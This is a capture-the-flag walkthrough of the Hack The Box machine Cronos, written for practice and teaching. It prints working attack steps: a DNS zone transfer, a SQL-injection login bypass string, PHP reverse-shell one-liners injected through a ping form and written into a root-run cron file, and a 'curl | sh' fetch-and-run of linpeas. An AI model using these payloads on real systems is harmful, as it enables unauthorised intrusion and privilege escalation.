Hack The Box
Machine Profile


Cronos - Description
OS: Linux
Difficulty: Medium
Points: 30
Release: 22 Mar 2017

Back with another retired machine on HackTheBox, this time we have Cronos, which if you break then it becomes Cron + OS.

From the name, I assume this machine must have something to do with Cron jobs, but it is an assumption.


As usual, we start with Nmap enumeration

nmap -sC -sV -A

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 20:20 EDT
Nmap scan report for cronos.htb (
Host is up (0.38s latency).
Not shown: 997 filtered ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Cronos
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.64 seconds

Services enumerated

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)

22/tcp SSH can help us with username enumeration

53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)

53/tcp Domain BIND v9 has known vulnerabilities

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

Apache server running at port 80

Starting with port 80,

  1. Navigate to
  2. Apache2 Ubuntu default page loads

  1. Apart from Apache default page nothing else is found.
  2. Its time to use our arsenals, that is dirb,disbuster to enumerate directories.
  3. Used Dirbuster and found nothing.
  4. This is what we call hitting a wall

It seems, IP might have a virtual hostname, lets try to find it via


In above command, we first set our nslookup server value and then pass the IP we want to lookup

From result, it looks the IP resolves to ns1.cronos.htb. We get our domain name cronos.htb

For cronos.htb to work, we need to resolve IP to cronos.htb in our /etc/hosts file.

To do so,

sudo nano /etc/hosts

and add below line cronos.htb

Now when we browse to cronos.htb page, it will be resolved to and will serve the page based on the virtual host configuration

When we browse to cronos.htb, we get this page

It did not contain anything else than the white page as shown above, which means we again hit a wall.

After looking at the Nmap scan again and again, the second service 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) kept bugging me. Port 53 why this service is used so I googled it.

Checking over google, gives following answer to question what port 53 used for

The DNS uses TCP Port 53 for zone transfer, for maintaining coherence between the DNS database and the server. The UDP protocol is used when a client sends a query to the DNS server. The TCP protocol should not be used for queries as it gives a lot of information, which is useful to attackers

Also not to forget, if you navigate to https://ns1.com/resources/bind-dns-pros-cons-and-alternatives

You will read that, BIND provides tools that help manage a DNS system, including:

  • dig - allows users to run DNS queries and view server output.
  • host - converts hostnames to IP addresses.
  • nslookup - queries DNS servers for information about hosts and domains.
  • Remote Name Daemon Control (rndc) - allows administrators to control all operations of the name server via an encrypted channel

Lets initiate a zone transfer and see what we get

dig axfr @ cronos.htb

Well well well, it looks like we hit a right wall this time,

I know, you must be in hurry to browse to admin.cronos.htb but wait, first add the subdomain in /etc/hosts admin.cronos.htb

Now lets browse to admin.cronos.htb

Awesome, we have a login form, without wasting any time, lets test the login page for boolean based SQL injection

Enter value of UserName : admin' or 'a'='a'-- a and password anything. Click submit

Yes, it is vulnerable to SQL injection and we are logged in

The form contains two services traceroute and Ping. Both are OS commands so we can get our reverse shell easily if user input is not properly santized.

Start a listener in your terminal

nc -nlvp 6001

Change the service from traceroute to Ping and enter value as; php -r '$sock=fsockopen("",6001);exec("/bin/sh -i <&3 >&3 2>&3");'

Click Execute

Hence we got our shell

The current user is www-data


Lets find our first flag to complete the ritual

cd /home && ls

User directory is noulis

cd noulis && ls

& in order to read flag

cat user.txt

Navigating to /root is denied, so we need to escalate privileges.

Try running sudo -l. It gives nothing.

When I dont find any service using sudo -l, then next thing I do is use linpeas to enumerate everything possible on the box

If you are new to linpeas, follow below steps to use it.

On your base machine(In my case it is kali Linux), run below commands

git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git 

Now navigate to privilege-escalation-awesome-scripts-suite

cd privilege-escalation-awesome-scripts-suite  && cd linPEAS 

Now run python server to serve the linpeas file to the cronos machine or to machine whose reverse shell you just got

python -m SimpleHTTPServer 6002 

Now in the cronos machine/Shell , Run

Note: Run below command in the reverse shell you just got

curl | sh   

Note : IP is my tun0 IP

The scan results a lot of juicy information, but we are interested in something which can get us root

If you remember, In starting I mentioned the machine name to be Cron+OS and it might have something to do with cron jobs. I think I was right.

The result of linpeas contains

You can also read the crontab by

cat /etc/crontab  

If you are new to cron jobs and want to learn about it then follow this blog. It explain cron jobs very well

Link: Cron Jobs with php

Also if you are new to Laravel and wondering what is artisan then follow this documentation

Link: Laravel Artisan

In short, Artisan is the command-line interface included with Laravel. It provides a number of helpful commands that can assist you while you build your application

The artisan file is run by root as shown in above image, if user www-data has write permission to artisan file, then we can get root. Lets check it by navigating to the location

cd /var/www/laravel && ls -la

Yess, the user has write permissions

Lets edit the file by running the below command

echo '<?php $sock=fsockopen("",6005);exec("/bin/sh -i <&3 >&3 2>&3"); ?>' > /var/www/laravel/artisan

The above command will change the commands written inside the artisan file

Now run a netcat listener to check if we get root

nc -nlvp 6005

Wait for the cronjob to do its work and give us a shell

Hence the R00t is pwned


To complete the ritual, lets find our root.txt



cat root.txt

Happy Pwning!!!!!